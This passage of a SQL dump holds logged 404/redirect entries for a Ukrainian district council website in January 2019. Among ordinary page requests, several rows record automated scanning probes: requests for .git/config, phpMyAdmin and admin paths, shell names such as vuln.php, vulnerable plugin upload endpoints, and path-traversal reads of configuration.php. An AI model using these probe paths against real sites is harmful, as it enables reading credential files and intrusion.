11:51:22','0000-00-00 00:00:00',301),(33095,'https://www.malyn-rayrada.gov.ua/index.php/1176-sogodni-pravoslavni-svyatkuyut-uspinnya-presvyatoji-bogoroditsi',NULL,'','',32,0,'2019-01-07 23:49:57','0000-00-00 00:00:00',301),(33096,'https://malyn-rayrada.gov.ua/attachments/article/2037/ð¿ñ–ð´ññƒð¼ðºð¸ ð³ð¾ð»ð¾ññƒð² 24 ñðµññ–ñ 15062018.pdf',NULL,'','',1,0,'2019-01-08 10:58:51','0000-00-00 00:00:00',301),(33097,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1735-pro-vnesennya-zmin-do-pereliku-sotsialnikh-poslug-umov-ta-poryadku-jikh-nadannya-strukturnimi-pidrozdilami-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu-zatverdzhennya-strukturi-ta-granichnoji-chiselnosti-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu',NULL,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1735-pro-vnesennya-zmin-do-pereliku-sotsialnikh-poslug-umov-ta-poryadku-jikh-nadannya-strukturnimi-pidrozdilami-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu-zatverdzhennya-strukturi-ta-granichnoji-chiselnosti-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu','',3,0,'2019-01-09 08:02:01','0000-00-00 00:00:00',301),(33098,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2148-pro-programu-stimulyuvannya-naselennya-ta-osbb-malinskogo-rajonu-shchodo-efektivnogo-vikoristannya-energetichnikh-resursiv-ta-energozberezhennya-na-2019-2020-roki',NULL,'','',27,0,'2019-01-09 15:08:15','0000-00-00 00:00:00',301),(33099,'https://malyn-rayrada.gov.ua/index.php/1647-pro-sklikannya-15-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',3,0,'2019-01-10 05:25:22','0000-00-00 00:00:00',301),(33100,'https://malyn-rayrada.gov.ua/index.php/1128-fotoreportazh-iz-svyatkuvannya-dnya-molodi-v-seli-pirizhki',NULL,'https://www.google.com.ua/','',22,0,'2019-01-10 15:17:49','0000-00-00 00:00:00',301),(33101,'https://malyn-rayrada.gov.ua/index.php',NULL,'','',415,0,'2019-01-11 06:44:12','0000-00-00 00:00:00',301),(33102,'https://malyn-rayrada.gov.ua/index.php/component/search/',NULL,'','',3,0,'2019-01-11 06:44:32','0000-00-00 00:00:00',301),(33103,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2148-pro-programu-stimulyuvannya-naselennya-ta-osbb-malinskogo-rajonu-shchodo-efektivnogo-vikoristannya-energetichnikh-resursiv-ta-energozberezhennya-na-2019-2020-roki',NULL,'','',16,0,'2019-01-11 10:03:08','0000-00-00 00:00:00',301),(33104,'https://malyn-rayrada.gov.ua/.git/info/refs?service=git-upload-pack',NULL,'','',1,0,'2019-01-11 15:43:05','0000-00-00 00:00:00',301),(33105,'https://www.malyn-rayrada.gov.ua/index.php/183-selu-ivanivka-210-rokiv?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2019-01-12 07:12:01','0000-00-00 00:00:00',301),(33106,'https://www.malyn-rayrada.gov.ua/attachments/article/1914/ð¦ð ð‘.pdf',NULL,'','',4,0,'2019-01-12 19:38:27','0000-00-00 00:00:00',301),(33107,'https://www.malyn-rayrada.gov.ua/attachments/article/1914/ð ð‘ðš.pdf',NULL,'','',4,0,'2019-01-12 19:38:29','0000-00-00 00:00:00',301),(33108,'https://www.malyn-rayrada.gov.ua/index.php/304-foto-video-reportazh-iz-vorsivki-7-travnja',NULL,'','',14,0,'2019-01-13 02:47:37','0000-00-00 00:00:00',301),(33109,'https://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-easy-gallery-pro/admin/php.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-easy-gallery-pro/admin/php.php','',2,0,'2019-01-14 15:07:52','0000-00-00 00:00:00',301),(33110,'https://www.malyn-rayrada.gov.ua/index.php/183-selu-ivanivka-210-rokiv',NULL,'','',12,0,'2019-01-14 23:50:22','0000-00-00 00:00:00',301),(33111,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1708-pro-zatverdzhennya-poryadku-obliku-vitrat-transportnikh-pidpriemstv-pilgovikh-kategorij-gromadyan-za-rakhunok-vidatkiv-z-mistsevogo-byudzhetu',NULL,'','',1,0,'2019-01-15 10:53:52','0000-00-00 00:00:00',301),(33112,'https://malyn-rayrada.gov.ua/wordpress/',NULL,'','',29,0,'2019-01-16 13:47:41','0000-00-00 00:00:00',301),(33113,'https://malyn-rayrada.gov.ua/wp/',NULL,'','',28,0,'2019-01-16 13:47:48','0000-00-00 00:00:00',301),(33114,'https://malyn-rayrada.gov.ua/blog/',NULL,'','',28,0,'2019-01-16 13:47:53','0000-00-00 00:00:00',301),(33115,'https://malyn-rayrada.gov.ua/new/',NULL,'','',28,0,'2019-01-16 13:47:55','0000-00-00 00:00:00',301),(33116,'https://malyn-rayrada.gov.ua/old/',NULL,'','',23,0,'2019-01-16 13:48:02','0000-00-00 00:00:00',301),(33117,'https://malyn-rayrada.gov.ua/test/',NULL,'','',22,0,'2019-01-16 13:48:08','0000-00-00 00:00:00',301),(33118,'https://malyn-rayrada.gov.ua/main/',NULL,'','',14,0,'2019-01-16 13:48:17','0000-00-00 00:00:00',301),(33119,'https://malyn-rayrada.gov.ua/site/',NULL,'','',19,0,'2019-01-16 13:48:30','0000-00-00 00:00:00',301),(33120,'https://malyn-rayrada.gov.ua/backup/',NULL,'','',16,0,'2019-01-16 13:48:33','0000-00-00 00:00:00',301),(33121,'https://malyn-rayrada.gov.ua/demo/',NULL,'','',14,0,'2019-01-16 13:48:37','0000-00-00 00:00:00',301),(33122,'https://malyn-rayrada.gov.ua/home/',NULL,'','',19,0,'2019-01-16 13:48:44','0000-00-00 00:00:00',301),(33123,'https://malyn-rayrada.gov.ua/temp/',NULL,'','',16,0,'2019-01-16 13:48:50','0000-00-00 00:00:00',301),(33124,'https://malyn-rayrada.gov.ua/attachments/article/1431/ðÿñ–ð´ññƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ññƒð²ð°ð½ð½ñ.pdf',NULL,'','',4,0,'2019-01-16 23:55:26','0000-00-00 00:00:00',301),(33125,'https://malyn-rayrada.gov.ua/index.php/1510-ogoloshennya-3',NULL,'','',46,0,'2019-01-17 04:38:54','0000-00-00 00:00:00',301),(33126,'https://malyn-rayrada.gov.ua/index.php/1519-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-zhitomirskoji-oblasti-informue-2',NULL,'','',44,0,'2019-01-17 23:40:04','0000-00-00 00:00:00',301),(33127,'https://www.malyn-rayrada.gov.ua/index.php/992-22-sichnya-den-sobornosti-ukrajini',NULL,'','',8,0,'2019-01-19 00:28:20','0000-00-00 00:00:00',301),(33128,'https://malyn-rayrada.gov.ua/index.php/916-svyatkovij-fleshmob-v-malinivtsi?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2019-01-19 04:23:19','0000-00-00 00:00:00',301),(33129,'https://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/2010-06-05-13-46-44/1436-informuyut-silski-ta-selishchni-radi',NULL,'','',4,0,'2019-01-20 09:42:40','0000-00-00 00:00:00',301),(33130,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-14122018-roku/2145-pro-rajonnij-byudzhet-malinskogo-rajonu-na-2019-rik',NULL,'https://www.google.com/','',31,0,'2019-01-21 09:12:18','0000-00-00 00:00:00',301),(33131,'https://www.malyn-rayrada.gov.ua/index.php/1139-obgovoreno-shlyakhi-pokrashchennya-spivpratsi-z-uchasnikami-ato',NULL,'','',15,0,'2019-01-22 06:19:44','0000-00-00 00:00:00',301),(33132,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-14122018-roku/2145-pro-rajonnij-byudzhet-malinskogo-rajonu-na-2019-rik',NULL,'','',20,0,'2019-01-22 18:13:49','0000-00-00 00:00:00',301),(33133,'https://www.malyn-rayrada.gov.ua/attachments/article/1919/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð³ð¾ð»ð¾ñ  22 ñ ðµñ ñ–ñ  02.02.2018.pdf',NULL,'','',2,0,'2019-01-23 06:31:43','0000-00-00 00:00:00',301),(33134,'https://malyn-rayrada.gov.ua/index.php/1716-osobistij-prijom-gromadyan-p-v-dzyublikom-24-kvitnya-2017-roku',NULL,'http://malyn-rayrada.gov.ua/index.php/1716-osobistij-prijom-gromadyan-p-v-dzyublikom-24-kvitnya-2017-roku','',3,0,'2019-01-24 04:29:30','0000-00-00 00:00:00',301),(33135,'https://www.malyn-rayrada.gov.ua/index.php/1680-do-vidoma-deputativ-rajonnoji-radi',NULL,'http://www.malyn-rayrada.gov.ua/index.php/1680-do-vidoma-deputativ-rajonnoji-radi','',1,0,'2019-01-24 06:06:10','0000-00-00 00:00:00',301),(33136,'https://malyn-rayrada.gov.ua/phpmyadmin/',NULL,'http://malyn-rayrada.gov.ua:80/phpmyadmin/','',11,0,'2019-01-25 09:59:44','0000-00-00 00:00:00',301),(33137,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1789-pro-peredachu-primishchennya-buvshoji-vishivskoji-zosh-i-ii-stupeniv-u-komunalnu-vlasnist-teritorialnoji-gromadi-vishivskoji-silskoji-radi',NULL,'','',7,0,'2019-01-25 17:44:31','0000-00-00 00:00:00',301),(33138,'https://malyn-rayrada.gov.ua/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',15,0,'2019-01-25 18:37:14','0000-00-00 00:00:00',301),(33139,'https://malyn-rayrada.gov.ua/index.php/1565-komunalne-pidpriemstvo-akhplan-malinskoji-rajonnoji-radi-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu',NULL,'','',1,0,'2019-01-25 19:12:33','0000-00-00 00:00:00',301),(33140,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1849-pro-zatverdzhennya-spilnikh-rozporyadzhen-golovi-rajonnoji-derzhavnoji-administratsiji-golovi-rajonnoji-radi',NULL,'','',1,0,'2019-01-25 19:14:56','0000-00-00 00:00:00',301),(33141,'https://malyn-rayrada.gov.ua/index.php/1467-teritorialnij-tsentr-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu',NULL,'','',2,0,'2019-01-25 21:21:40','0000-00-00 00:00:00',301),(33142,'https://malyn-rayrada.gov.ua/index.php/1437-pro-priznachennya-yu-rudchenka-golovoyu-malinskoji-rajonnoji-derzhavnoji-administratsiji-zhitomirskoji-oblasti',NULL,'','',7,0,'2019-01-25 22:52:30','0000-00-00 00:00:00',301),(33143,'https://malyn-rayrada.gov.ua/index.php/916-svyatkovij-fleshmob-v-malinivtsi',NULL,'','',30,0,'2019-01-26 01:04:14','0000-00-00 00:00:00',301),(33144,'https://malyn-rayrada.gov.ua/index.php/1404-novini-iz-rajonnoji-spartakiadi',NULL,'','',2,0,'2019-01-26 02:48:26','0000-00-00 00:00:00',301),(33145,'https://malyn-rayrada.gov.ua/index.php/1375-pro-sklikannya-5-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',1,0,'2019-01-26 02:48:36','0000-00-00 00:00:00',301),(33146,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1483-pro-priznachennya-direktora-komunalnogo-zakladu-rajonnij-budinok-kulturi-malinskoji-rajonnoji-radi',NULL,'','',1,0,'2019-01-26 02:50:07','0000-00-00 00:00:00',301),(33147,'https://malyn-rayrada.gov.ua/index.php/1334-pro-sklikannya-4-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',2,0,'2019-01-26 03:24:40','0000-00-00 00:00:00',301),(33148,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1722-pro-priznachennya-direktora-komunalnogo-zakladu-tsentralna-rajonna-biblioteka-im-v-surativskogo-malinskoji-rajonnoji-radi',NULL,'','',1,0,'2019-01-26 03:26:07','0000-00-00 00:00:00',301),(33149,'https://malyn-rayrada.gov.ua/index.php/1503-malinski-podatkivtsi-informuyut',NULL,'','',2,0,'2019-01-26 04:19:12','0000-00-00 00:00:00',301),(33150,'https://malyn-rayrada.gov.ua/wp-content/plugins/dzs-zoomsounds/admin/upload.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/dzs-zoomsounds/admin/upload.php','',2,0,'2019-01-26 04:56:16','0000-00-00 00:00:00',301),(33151,'https://malyn-rayrada.gov.ua/index.php/1434-visti-iz-chempionatu-ukrajini-z-boksu-sered-yunakiv',NULL,'','',1,0,'2019-01-26 08:03:16','0000-00-00 00:00:00',301),(33152,'https://malyn-rayrada.gov.ua/index.php/761-pid-chas-vikonannja-robit-po-blagoustroju-centru',NULL,'','',1,0,'2019-01-26 08:03:18','0000-00-00 00:00:00',301),(33153,'https://malyn-rayrada.gov.ua/index.php/810-centrviborchkom-obrobiv-100-protokoliv-za',NULL,'','',4,0,'2019-01-26 08:58:44','0000-00-00 00:00:00',301),(33154,'https://malyn-rayrada.gov.ua/index.php/1343-z-1-sichnya-startuvala-deklaratsijna-kampaniya-2016',NULL,'','',5,0,'2019-01-26 08:59:17','0000-00-00 00:00:00',301),(33155,'https://malyn-rayrada.gov.ua/index.php/1469-komunalne-pidpriemstvo-malinska-rajonna-drukarnya-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu',NULL,'','',2,0,'2019-01-26 09:46:56','0000-00-00 00:00:00',301),(33156,'https://malyn-rayrada.gov.ua/index.php/849-nareshti',NULL,'','',2,0,'2019-01-26 10:29:43','0000-00-00 00:00:00',301),(33157,'https://malyn-rayrada.gov.ua/index.php/569-den-sela-u-vladivci-fotoreportazh',NULL,'','',2,0,'2019-01-26 10:30:10','0000-00-00 00:00:00',301),(33158,'https://malyn-rayrada.gov.ua/index.php/1371-kajdasheva-sim-ya-u-vikonanni-artistiv-chopovitskoji-gromadi',NULL,'','',2,0,'2019-01-26 12:02:46','0000-00-00 00:00:00',301),(33159,'https://malyn-rayrada.gov.ua/pma/',NULL,'','',4,0,'2019-01-26 12:36:17','0000-00-00 00:00:00',301),(33160,'https://malyn-rayrada.gov.ua/myadmin/',NULL,'','',1,0,'2019-01-26 12:36:19','0000-00-00 00:00:00',301),(33161,'https://malyn-rayrada.gov.ua/sql/',NULL,'','',1,0,'2019-01-26 12:36:20','0000-00-00 00:00:00',301),(33162,'https://malyn-rayrada.gov.ua/mysqladmin/',NULL,'','',1,0,'2019-01-26 12:36:21','0000-00-00 00:00:00',301),(33163,'https://malyn-rayrada.gov.ua/index.php/1409-ogoloshennya-2',NULL,'','',1,0,'2019-01-26 12:48:33','0000-00-00 00:00:00',301),(33164,'https://malyn-rayrada.gov.ua/index.php/1355-v-ukrajini-sogodni-den-vshanuvannya-uchasnikiv-bojovikh-dij-na-teritoriji-inshikh-derzhav-nasampered-tsej-den-stosuetsya-vijskovikh-yaki-voyuvali-v-afganistani',NULL,'','',1,0,'2019-01-26 12:49:29','0000-00-00 00:00:00',301),(33165,'https://malyn-rayrada.gov.ua/wp/wp-login.php',NULL,'http://malyn-rayrada.gov.ua/wp/wp-login.php','',14,0,'2019-01-26 15:25:06','0000-00-00 00:00:00',301),(33166,'https://malyn-rayrada.gov.ua/index.php/881-pozachergovi-vibori-narodnikh-deputativ-ukrajini-26-zhovtnya-2014-roku-informatsiya-tsvk-stanom-na-20-godinu-28-09-2014-roku',NULL,'','',1,0,'2019-01-26 15:42:21','0000-00-00 00:00:00',301),(33167,'https://malyn-rayrada.gov.ua/index.php/1411-povidomlennya-pro-ogoloshennya-konkursu',NULL,'','',2,0,'2019-01-26 16:37:25','0000-00-00 00:00:00',301),(33168,'https://malyn-rayrada.gov.ua/index.php/1511-gorinska-silska-rada-informue-shchodo-zatverdzhennya-podatkiv-i-zboriv',NULL,'','',1,0,'2019-01-26 18:08:51','0000-00-00 00:00:00',301),(33169,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1470-pro-likvidatsiyu-pristantsijnoji-zosh-i-ii-stupeniv',NULL,'','',1,0,'2019-01-26 18:13:55','0000-00-00 00:00:00',301),(33170,'https://malyn-rayrada.gov.ua/index.php/1515-informatsiya-shchodo-roboti-kabelnogo-telebachennya-v-mikrorajoni-paperovoji-fabriki',NULL,'','',27,0,'2019-01-26 18:56:34','0000-00-00 00:00:00',301),(33171,'https://malyn-rayrada.gov.ua/index.php/781-vipadkove-foto',NULL,'','',1,0,'2019-01-26 19:42:53','0000-00-00 00:00:00',301),(33172,'https://malyn-rayrada.gov.ua/index.php/1518-ksaverivska-silska-rada-informue',NULL,'','',5,0,'2019-01-26 22:02:13','0000-00-00 00:00:00',301),(33173,'https://malyn-rayrada.gov.ua/index.php/1742-upravlinnya-derzhprodspozhivsluzhbi-v-malinskomu-rajoni-zasterigae',NULL,'','',3,0,'2019-01-26 22:02:24','0000-00-00 00:00:00',301),(33174,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1489-pro-priznachennya-direktora-komunalnogo-zakladu-rajonnij-budinok-kulturi-malinskoji-rajonnoji-radi-2',NULL,'','',2,0,'2019-01-26 22:06:36','0000-00-00 00:00:00',301),(33175,'https://malyn-rayrada.gov.ua/index.php/1514-ogoloshuetsya-konkurs-na-viznachennya-peremozhtsiv',NULL,'','',1,0,'2019-01-26 22:36:52','0000-00-00 00:00:00',301),(33176,'https://malyn-rayrada.gov.ua/index.php/1476-vitaemo-iz-svyatom-3',NULL,'','',3,0,'2019-01-27 00:55:02','0000-00-00 00:00:00',301),(33177,'https://malyn-rayrada.gov.ua/site/wp-admin/',NULL,'','',1,0,'2019-01-27 01:07:51','0000-00-00 00:00:00',301),(33178,'https://malyn-rayrada.gov.ua/blog/wp-login.php',NULL,'http://malyn-rayrada.gov.ua/blog/wp-login.php','',7,0,'2019-01-27 01:22:09','0000-00-00 00:00:00',301),(33179,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1488-pro-zvilnennya-melnika-a-p',NULL,'','',3,0,'2019-01-27 03:17:35','0000-00-00 00:00:00',301),(33180,'https://www.malyn-rayrada.gov.ua/index.php/2091-plan-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-26-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'','',15,0,'2019-01-27 05:34:33','0000-00-00 00:00:00',301),(33181,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1490-pro-vnesennya-zmin-ta-zatverdzhennya-u-novij-redaktsiji-statutiv-komunalnikh-zakladiv-kulturi',NULL,'','',3,0,'2019-01-27 05:35:42','0000-00-00 00:00:00',301),(33182,'https://malyn-rayrada.gov.ua/index.php/1363-z-1-sichnya-startuvala-deklaratsijna-kampaniya-2017',NULL,'','',4,0,'2019-01-27 06:17:51','0000-00-00 00:00:00',301),(33183,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1813-pro-vshanuvannya-pam-yati-zhertv-tragediji-virmenskogo-narodu',NULL,'','',5,0,'2019-01-27 06:22:06','0000-00-00 00:00:00',301),(33184,'https://malyn-rayrada.gov.ua/index.php/1447-informatsijne-povidomlennya-pro-ogoloshennya-konkursu-z-vidboru-sub-ektiv-diyalnosti-dlya-provedennya-kapitalnikh-remontiv-ob-ektiv-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu',NULL,'','',3,0,'2019-01-27 07:04:04','0000-00-00 00:00:00',301),(33185,'https://malyn-rayrada.gov.ua/index.php/1272-z-dnem-zbrojnikh-sil-ukrajini',NULL,'','',13,0,'2019-01-27 07:05:34','0000-00-00 00:00:00',301),(33186,'https://malyn-rayrada.gov.ua/index.php/1582-ogoloshennya-pro-provedennya-konkursu-na-pravo-orendi-majna-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-malinskogo-rajonu',NULL,'','',4,0,'2019-01-27 07:50:48','0000-00-00 00:00:00',301),(33187,'https://malyn-rayrada.gov.ua/index.php/1330-do-vidoma-pensioneriv-mista-ta-rajonu',NULL,'','',1,0,'2019-01-27 08:37:13','0000-00-00 00:00:00',301),(33188,'https://malyn-rayrada.gov.ua/index.php/435-nareshti-vigljanulo-sonce',NULL,'','',1,0,'2019-01-27 09:23:48','0000-00-00 00:00:00',301),(33189,'https://malyn-rayrada.gov.ua/attachments/article/1838/ð¿ñ–ð´ññƒð¼ðºð¸ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ññƒð²ð°ð½ð½ñ.pdf',NULL,'','',5,0,'2019-01-27 09:36:41','0000-00-00 00:00:00',301),(33190,'https://malyn-rayrada.gov.ua/index.php/1780-upravlinnya-derzhprodspozhivsluzhbi-v-malinskomu-rajoni-nagoloshue-vid-kishkovikh-infektsij-mozhna-uberegtisya',NULL,'','',2,0,'2019-01-27 10:21:54','0000-00-00 00:00:00',301),(33191,'https://malyn-rayrada.gov.ua/index.php/1403-sportivni-novini',NULL,'','',3,0,'2019-01-27 12:42:47','0000-00-00 00:00:00',301),(33192,'https://malyn-rayrada.gov.ua/index.php/1765-pro-sklikannya-18-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',3,0,'2019-01-27 13:29:47','0000-00-00 00:00:00',301),(33193,'https://malyn-rayrada.gov.ua/index.php/1840-pro-sklikannya-21-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',2,0,'2019-01-27 13:29:49','0000-00-00 00:00:00',301),(33194,'https://malyn-rayrada.gov.ua/index.php/1533-ogoloshennya-pro-shchodo-orendi-komunalnogo-majna',NULL,'','',3,0,'2019-01-27 14:17:20','0000-00-00 00:00:00',301),(33195,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1501-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2016-rik',NULL,'','',3,0,'2019-01-27 16:37:05','0000-00-00 00:00:00',301),(33196,'https://malyn-rayrada.gov.ua/index.php/837-mi-budemo-nastupati-i-zvilnjati-nashu-zemlju',NULL,'','',1,0,'2019-01-27 17:16:33','0000-00-00 00:00:00',301),(33197,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1728-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji',NULL,'','',8,0,'2019-01-27 17:23:45','0000-00-00 00:00:00',301),(33198,'https://malyn-rayrada.gov.ua/index.php/1341-oberezhno-grip',NULL,'','',1,0,'2019-01-27 17:52:59','0000-00-00 00:00:00',301),(33199,'https://malyn-rayrada.gov.ua/index.php/1513-ksaverivska-silska-rada-informue-shchodo-proektiv-regulyatornikh-aktiv',NULL,'','',2,0,'2019-01-27 23:20:53','0000-00-00 00:00:00',301),(33200,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1750-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2017-rik',NULL,'','',1,0,'2019-01-28 01:30:50','0000-00-00 00:00:00',301),(33201,'https://malyn-rayrada.gov.ua/index.php/801-nacionalnij-ekzit-pol-drugogo-turu-ne-bude',NULL,'','',1,0,'2019-01-28 02:22:23','0000-00-00 00:00:00',301),(33202,'https://malyn-rayrada.gov.ua/index.php/1412-kp-arkhplan-informue',NULL,'','',4,0,'2019-01-28 02:59:38','0000-00-00 00:00:00',301),(33203,'https://malyn-rayrada.gov.ua/index.php/1439-v-ukrajini-sogodni-vidznachaetsya-den-peremogi-nad-natsizmom-u-drugij-svitovij-vijni-1939-1945-rokiv',NULL,'','',3,0,'2019-01-28 04:41:05','0000-00-00 00:00:00',301),(33204,'https://malyn-rayrada.gov.ua/index.php/414-fotoreportazh-iz-svjatkuvannja-dnja-miscevogo',NULL,'','',1,0,'2019-01-28 07:42:54','0000-00-00 00:00:00',301),(33205,'https://malyn-rayrada.gov.ua/index.php/1459-pro-sklikannya-8-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',2,0,'2019-01-28 08:18:57','0000-00-00 00:00:00',301),(33206,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-15-01-2016-roku/favicon.ico',NULL,'','',1,0,'2019-01-28 10:01:45','0000-00-00 00:00:00',301),(33207,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1736-pro-vnesennya-zmin-do-pereliku-sotsialnikh-poslug-umov-ta-poryadku-jikh-nadannya-strukturnimi-pidrozdilami-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu',NULL,'','',3,0,'2019-01-28 10:43:44','0000-00-00 00:00:00',301),(33208,'https://malyn-rayrada.gov.ua/index.php/1791-pro-sklikannya-19-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',2,0,'2019-01-28 12:14:41','0000-00-00 00:00:00',301),(33209,'https://malyn-rayrada.gov.ua/index.php/1451-ogoloshennya-shchodo-orendi',NULL,'','',2,0,'2019-01-28 14:34:05','0000-00-00 00:00:00',301),(33210,'https://malyn-rayrada.gov.ua/index.php/1441-pro-sklikannya-7-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',2,0,'2019-01-28 14:34:37','0000-00-00 00:00:00',301),(33211,'https://malyn-rayrada.gov.ua/index.php/576-vipadkove-foto-22-07-2013-roku-21-00-god',NULL,'','',5,0,'2019-01-28 14:34:39','0000-00-00 00:00:00',301),(33212,'https://malyn-rayrada.gov.ua/index.php/1353-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-informue',NULL,'','',1,0,'2019-01-28 17:38:43','0000-00-00 00:00:00',301),(33213,'https://malyn-rayrada.gov.ua/index.php/653-svjato-jakogo-chekali-dva-roki-prijshlo-do-ditok',NULL,'','',1,0,'2019-01-28 18:23:09','0000-00-00 00:00:00',301),(33214,'https://malyn-rayrada.gov.ua/index.php/1805-pro-sklikannya-20-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',3,0,'2019-01-28 19:08:30','0000-00-00 00:00:00',301),(33215,'https://malyn-rayrada.gov.ua/index.php/1530-vidbulas-9-pozachergova-sesiya-rajonnoji-radi',NULL,'','',23,0,'2019-01-29 11:44:03','0000-00-00 00:00:00',301),(33216,'https://malyn-rayrada.gov.ua/images/vuln2.php',NULL,'','',18,0,'2019-01-29 13:23:17','0000-00-00 00:00:00',301),(33217,'https://malyn-rayrada.gov.ua/tmp/vuln2.php',NULL,'','',18,0,'2019-01-29 13:23:18','0000-00-00 00:00:00',301),(33218,'https://malyn-rayrada.gov.ua/images/vuln.php',NULL,'','',22,0,'2019-01-29 13:23:18','0000-00-00 00:00:00',301),(33219,'https://malyn-rayrada.gov.ua/tmp/vuln.php',NULL,'','',21,0,'2019-01-29 13:23:19','0000-00-00 00:00:00',301),(33220,'https://malyn-rayrada.gov.ua/plugins/content/s5_media_player/helper.php?fileurl=li4vli4vli4vy29uzmlndxjhdglvbi5waha=',NULL,'','',13,0,'2019-01-29 13:23:26','0000-00-00 00:00:00',301),(33221,'https://malyn-rayrada.gov.ua/components/com_jbcatalog/libraries/jsupload/server/php',NULL,'','',14,0,'2019-01-29 13:23:27','0000-00-00 00:00:00',301),(33222,'https://malyn-rayrada.gov.ua/components/com_sexycontactform/fileupload/',NULL,'','',13,0,'2019-01-29 13:23:27','0000-00-00 00:00:00',301),(33223,'https://malyn-rayrada.gov.ua/images/stories/up.php',NULL,'','',27,0,'2019-01-29 13:23:28','0000-00-00 00:00:00',301),(33224,'https://malyn-rayrada.gov.ua/components/com_facileforms/libraries/jquery/uploadify.php',NULL,'','',14,0,'2019-01-29 13:23:31','0000-00-00 00:00:00',301),(33225,'https://malyn-rayrada.gov.ua/fckeditor/editor/filemanager/connectors/php/upload.php?type=media',NULL,'','',13,0,'2019-01-29 13:23:32','0000-00-00 00:00:00',301),(33226,'https://malyn-rayrada.gov.ua/joomla/',NULL,'','',1,0,'2019-01-30 00:35:09','0000-00-00 00:00:00',301),(33227,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1744-pro-zvernennya-shchodo-zberezhennya-lisiv',NULL,'','',2,0,'2019-01-30 06:48:03','0000-00-00 00:00:00',301),(33228,'https://malyn-rayrada.gov.ua/wp-admin/',NULL,'https://malyn-rayrada.gov.ua/wp-login.php','',9,0,'2019-01-30 10:25:10','0000-00-00 00:00:00',301),(33229,'https://malyn-rayrada.gov.ua/admin.php',NULL,'','',11,0,'2019-01-30 10:27:09','0000-00-00 00:00:00',301),(33230,'https://www.malyn-rayrada.gov.ua/.git/config',NULL,'','',2,0,'2019-01-30 23:24:53','0000-00-00 00:00:00',301),(33231,'https://malyn-rayrada.gov.ua/.git/config',NULL,'','',7,0,'2019-01-30 23:24:54','0000-00-00 00:00:00',301),(33232,'https://www.malyn-rayrada.gov.ua/index.php/1912-pro-sklikannya-22-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',3,0,'2019-02-01 12:25:17','0000-00-00 